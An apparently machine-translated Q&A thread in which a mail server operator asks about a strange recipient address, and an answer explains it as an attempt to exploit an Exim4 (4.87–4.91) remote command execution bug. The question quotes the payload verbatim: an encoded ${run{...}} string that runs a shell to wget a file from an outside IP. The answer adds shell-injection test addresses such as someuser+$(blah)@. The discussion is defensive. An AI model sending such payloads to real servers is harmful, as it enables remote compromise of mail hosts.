私は独自のメール サーバーを運用していますが、時々、ルート アカウントにスパムや謎のメールが送られてきます。最近、次の宛先に空メールが届きました:
ルート+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f193.150.14.196x22}}@マイドメイン.tld
その文字列の2番目のIPアドレスは、私がサーバーを借りている同じホスティングサービスが所有しているようです。走るそしてwget私には非常に疑わしいように見えますが、インターネット上ではそのような攻撃については何も見つかりませんでした。
サーバーのメールログによると、そのメールは148.72.206.111から送信された。しかし、からフィールドは[メールアドレス]。
これが何を意味するのか誰か知っていますか?
答え1
これは、Exim4 SMTP サーバー (v4.87 から v4.91) で最近発見されたバグを悪用する試みです。このバグにより、Exim が${variable}本来は展開されないはずの特定の場所で置換を展開するため、リモート コマンドの実行が可能になります。(この構文は、メインの Exim 構成ファイルで広く使用されています。)
このバグは脆弱性(商標名やロゴはまだありません)。ディストリビューションから Exim4 を使用していた場合は、すでにパッチを受け取っているはずです。Postfix を使用しているため、そもそも影響はありません。
(そうは言っても、Postfix でも、 の後のパラメータは、たとえば Procmail を呼び出すときなど、コマンド ラインの一部として頻繁に使用されます。や の+ようなものがどのように処理されるかを確認するために、自分のサーバーでいくつかのテストを行うことをお勧めします。)someuser+$(blah)@someuser+`blah`@